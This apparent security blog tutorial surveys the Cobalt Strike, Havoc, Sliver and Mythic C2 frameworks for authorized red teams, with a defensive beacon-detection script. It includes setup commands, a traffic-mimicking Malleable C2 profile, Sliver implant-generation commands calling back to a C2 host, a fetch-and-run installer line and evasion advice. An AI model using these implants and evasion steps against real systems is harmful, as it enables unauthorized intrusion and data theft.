Ethical Hacking · #red team #c2 framework #cobalt strike

C2 Frameworks Overview: Cobalt Strike, Havoc, Sliver & Mythic

Overview of Command and Control frameworks for authorized red teams: Cobalt Strike, Havoc, Sliver, and Mythic. Architecture, features, and use cases.


Command and Control (C2) frameworks are the operational backbone of authorized red team engagements. They provide post-exploitation management: deploying agents (implants) on compromised systems, issuing commands, exfiltrating data, maintaining persistence, and pivoting through internal networks — all through an encrypted, resilient communication channel. This article provides a technical overview of the four most widely used C2 frameworks in professional red team operations: Cobalt Strike, Havoc, Sliver, and Mythic.

Authorization is mandatory. C2 infrastructure may only be deployed against systems and networks for which you have explicit written authorization. These tools are for professional red teamers, penetration testers, and security researchers conducting authorized engagements. Unauthorized use is a serious criminal offense.

What Is a C2 Framework?

A C2 framework consists of three core components:

  1. Team Server (C2 Server) — The centralized server that operators connect to. It manages agents, hosts payloads, logs activity, and relays commands.
  2. Agent/Implant — A piece of software deployed on the compromised target. It checks in with the team server at regular intervals to receive and execute commands.
  3. Operator Interface — The UI or CLI that red team operators use to interact with compromised systems via the team server.

The communication between agent and server uses protocols like HTTPS, DNS, SMB named pipes, or custom protocols to blend with legitimate traffic and evade detection.

C2 Architecture Concepts

Before diving into specific tools, understand these key architectural concepts:

  • Beacon/Implant — Agent running on the compromised host
  • Check-in interval (sleep) — How often the agent polls the server; longer = stealthier
  • Jitter — Random variance added to the sleep interval to avoid detection
  • Listener — Server-side component awaiting agent connections
  • Stager — Small initial payload that downloads the full implant
  • Stageless payload — Full implant in a single file (larger but more reliable)
  • Redirector — Proxy server between agent and team server for opsec
  • Malleable C2 — Configurable communication profile to mimic legitimate traffic

Cobalt Strike

Cobalt Strike by Fortra (formerly HelpSystems) is the industry-standard commercial C2 framework, originally designed for adversary simulation. It has been used by both red teams and real-world threat actors (cracked versions), which has led to extensive detection coverage — making it both realistic for simulation and challenging to operate stealthily without careful configuration.

Key Features

  • Beacon — Cobalt Strike’s flagship agent. Supports HTTP, HTTPS, SMB, TCP, and DNS communication channels.
  • Malleable C2 Profiles — Configuration files that shape Beacon’s network traffic to mimic legitimate applications (Amazon CloudFront traffic, jQuery requests, etc.)
  • Aggressor Script — A scripting language for automating post-exploitation tasks and extending the framework
  • Team Server — Multi-operator support; multiple red teamers can share one engagement
  • Built-in post-exploitation — Port scanning, credential dumping (via Mimikatz integration), lateral movement, keylogging, screenshots

Basic Setup

# Start the team server
./teamserver [external_ip] [password] [malleable_c2_profile]

# Example
./teamserver 203.0.113.10 "StrongPassword!" amazon.profile

Operators connect via the Cobalt Strike GUI client:

Host: 203.0.113.10
Port: 50050
User: operator
Password: StrongPassword!

Configuring a Listener and Generating a Beacon

  1. Cobalt Strike → Listeners → Add
  2. Choose HTTP or HTTPS, set the listening port and host
  3. Attacks → Packages → Windows EXE (Stageless) to generate a payload
  4. Deliver payload via phishing, exploitation, or physical access

Malleable C2 Profiles

Profiles define how Beacon communicates. A well-crafted profile makes Beacon traffic indistinguishable from normal web browsing:

https-certificate {
    set CN "*.cloudfront.net";
    set O "Amazon.com Inc.";
    set C "US";
}

http-get {
    set uri "/s/ref=nb_sb_noss_1/";
    client {
        header "Accept" "text/html,application/xhtml+xml";
        header "Host" "www.amazon.com";
    }
}

Pricing: ~$5,900/year per operator. Legitimate commercial purchase required.

Detection Considerations

Blue teams extensively monitor for Cobalt Strike indicators:

  • Default Beacon sleep (60 seconds) and jitter values
  • Default SSL certificate thumbprints
  • Named pipe patterns (default: \\.\pipe\MSSE-*)
  • Specific in-memory signatures (YARA rules)

Operators must customize profiles, change default pipe names, and use process injection carefully to reduce detection.
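The sleep and jitter concepts from the architecture table are also what a blue team keys on: a fixed check-in interval with a small random variance produces inter-request gaps that are far more regular than human browsing. The following is an added example, not code from any of the frameworks covered here; it analyses a constructed proxy log (hypothetical hosts and the profile URI shown above) and flags (source, destination) pairs whose gaps have a low coefficient of variation.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (timestamp src dst uri). The first host polls one
# URI roughly every 60 s with small jitter; the second browses normally.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 203.0.113.10 /s/ref=nb_sb_noss_1/
2024-05-01T10:01:03 10.0.0.5 203.0.113.10 /s/ref=nb_sb_noss_1/
2024-05-01T10:02:01 10.0.0.5 203.0.113.10 /s/ref=nb_sb_noss_1/
2024-05-01T10:03:05 10.0.0.5 203.0.113.10 /s/ref=nb_sb_noss_1/
2024-05-01T10:04:00 10.0.0.5 203.0.113.10 /s/ref=nb_sb_noss_1/
2024-05-01T10:00:10 10.0.0.7 198.51.100.20 /index.html
2024-05-01T10:00:12 10.0.0.7 198.51.100.20 /style.css
2024-05-01T10:07:40 10.0.0.7 198.51.100.20 /news/
2024-05-01T10:31:05 10.0.0.7 198.51.100.20 /about
2024-05-01T10:31:06 10.0.0.7 198.51.100.20 /logo.png
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")

def parse_log(text):
    """Group request timestamps by (source, destination) pair."""
    pairs = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, dst, _uri = m.groups()
            pairs[(src, dst)].append(datetime.fromisoformat(ts))
    return pairs

def interval_stats(timestamps):
    """Median gap and coefficient of variation (stdev/mean) of the gaps."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 3:
        return None
    return statistics.median(gaps), statistics.pstdev(gaps) / statistics.mean(gaps)

def find_beacons(text, min_requests=5, max_cv=0.15):
    """Return {(src, dst): (median_gap_s, cv)} for pairs with near-constant gaps."""
    flagged = {}
    for pair, stamps in parse_log(text).items():
        if len(stamps) >= min_requests:
            stats = interval_stats(stamps)
            # A 60 s sleep with small jitter scores a low CV; browsing is bursty.
            if stats and stats[1] <= max_cv:
                flagged[pair] = stats
    return flagged
```

Raising the sleep to hours and the jitter to a large percentage, as the text recommends, pushes the CV above the threshold, which is exactly why defaults are the first thing monitored.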

Havoc Framework

Havoc is a modern, free, open-source C2 framework written in Go and C. Released in 2022 by C5pider, it was designed as a free alternative to Cobalt Strike with comparable capabilities. It has seen rapid community adoption and active development.

Key Features

  • Demon — Havoc’s agent. Supports HTTP/S, SMB, and custom protocols
  • Modern UI — A sleek Qt-based dashboard (GUI) for team operations
  • Teamserver written in Go — Fast and cross-platform
  • Extendable — Supports custom agents and modules written in C
  • OPSEC features — Sleep obfuscation, indirect syscalls, stack spoofing to evade EDR

Installation and Setup

git clone https://github.com/HavocFramework/Havoc
cd Havoc

# Install dependencies (Kali/Debian)
sudo apt install build-essential cmake mingw-w64 nasm golang python3 python3-pip -y

# Build teamserver
cd teamserver
go mod download
go build -o havoc .

# Build client GUI
cd ../client
mkdir build && cd build
cmake ..
make -j4

Start the team server:

./havoc server --profile ./profiles/havoc.yaotl

Connect with the GUI client and create a listener (HTTP/S), then generate a Demon payload.

Why Choose Havoc?

Havoc is an excellent choice for red teams that:

  • Cannot afford Cobalt Strike licensing
  • Want to study and understand C2 internals (source is available)
  • Need to customize the agent’s behavior significantly
  • Want modern EDR evasion built in from the start

Because Havoc is newer, commercial EDR vendors have less mature detection coverage for it compared to Cobalt Strike — though this gap is closing quickly.

Sliver

Sliver is an open-source C2 framework developed and maintained by BishopFox. Written entirely in Go, it is cross-platform and supports Windows, macOS, and Linux implants out of the box with a strong focus on operational security.

Key Features

  • Multi-protocol support — mTLS, HTTP/S, DNS, WireGuard as C2 channels
  • Multiplayer — built-in multi-operator support
  • Cross-platform implants — generate payloads for Windows, Linux, and macOS
  • In-memory execution — BOF (Beacon Object File) support for in-process execution
  • Implant obfuscation — built-in garble support to obfuscate Go binaries at compile time
  • WireGuard C2 — unique VPN-based C2 channel for stealthy communications

Installation

# One-line installer
curl https://sliver.sh/install | sudo bash

# Or manual build
git clone https://github.com/BishopFox/sliver
cd sliver
make

Start the Sliver server:

sudo sliver-server

Basic Usage

# Inside Sliver console

# Generate an HTTPS implant for Windows
generate --http https://203.0.113.10 --os windows --arch amd64 --save /tmp/implant.exe

# Generate a DNS implant (stealthier)
generate --dns c2.yourdomain.com --os windows --arch amd64

# Start an HTTPS listener
https --lhost 0.0.0.0 --lport 443

# List active sessions
sessions

# Interact with a session
use [session-id]

Post-Exploitation in Sliver

# Inside a session
whoami
ps
netstat
upload /local/file /remote/path
download /remote/file /local/path
execute-assembly /path/to/SharpHound.exe -c All
sideload /path/to/inject.dll

Sliver’s integration with Armory provides a curated list of BOFs and additional tools installable with:

armory install all

Mythic

Mythic is a collaborative, open-source C2 framework developed by SpecterOps (originally by @its_a_feature_). It takes a unique modular approach — the framework itself is agent-agnostic, and agents (called payloads) are installed as separate plugins from the Mythic agent repository.

Architecture

Mythic runs entirely in Docker, making deployment consistent and reproducible:

git clone https://github.com/its-a-feature/Mythic
cd Mythic
sudo ./install_docker_debian.sh
sudo make

Key Concepts

  • Agents — Installed separately: Apfell (macOS JS), Apollo (Windows .NET), Poseidon (cross-platform Go), Medusa (Python), Thanatos (Rust)
  • C2 Profiles — Communication channel definitions (HTTP, Websocket, dynamicHTTP), installed as Docker containers
  • Operators — Multi-user support with role-based access
  • Callbacks — Active agent sessions
  • Task Tracking — Every command is logged with status, output, and timestamp for audit trails

Installing Agents

# From the Mythic checkout on the host (mythic-cli runs outside the containers)
./mythic-cli install github https://github.com/MythicAgents/Apollo
./mythic-cli install github https://github.com/MythicAgents/Poseidon
./mythic-cli install github https://github.com/MythicC2Profiles/http

Why Mythic?

  • Best documentation and reporting features in the open-source space
  • Audit trail — every action is logged for client deliverables
  • Modular — swap agents and C2 channels without changing the core
  • Educational — excellent for learning how C2 frameworks work internally
  • Active development — SpecterOps continuously improves it

Choosing the Right C2 Framework

  • Enterprise red team with budget — Cobalt Strike (most realistic simulation)
  • Budget-conscious red team, Windows focus — Havoc
  • Multi-platform engagements (Windows/Linux/macOS) — Sliver
  • Learning C2 internals / educational use — Mythic
  • Long-term adversary simulation — Cobalt Strike + custom profiles

Operational Security (OPSEC) Fundamentals

Regardless of which framework you use, these principles apply:

  1. Use redirectors — Never expose your team server directly. Route traffic through cloud VPS instances (HTTPS redirectors using Nginx or Apache mod_rewrite rules).
  2. Customize everything — Change all default values: sleep times, pipe names, certificate details, URI paths.
  3. Use legitimate infrastructure — Host redirectors on reputable cloud providers (AWS CloudFront, Azure CDN) to blend with normal traffic.
  4. Categorize your domain — Register domains that are pre-categorized in web filtering databases (financial, tech) to bypass proxy filters.
  5. Monitor your own implant — Know what artifacts your chosen agent leaves on disk and in memory.
  6. Clean up — Remove all persistence, implants, and created accounts at engagement end.

Summary

C2 frameworks are the operational hub of red team engagements, enabling persistent access, lateral movement, and post-exploitation at scale. Cobalt Strike remains the gold standard for enterprise engagements due to its maturity and realism. Havoc and Sliver offer powerful free alternatives with modern EDR evasion. Mythic excels in documentation-heavy engagements and educational contexts. All four are legitimate tools for authorized security professionals — the key word being authorized. Mastering one of these frameworks deeply, along with strong OPSEC practices, is what separates a functional red team from a truly effective one.

#sliver #cobalt strike #c2 framework #red team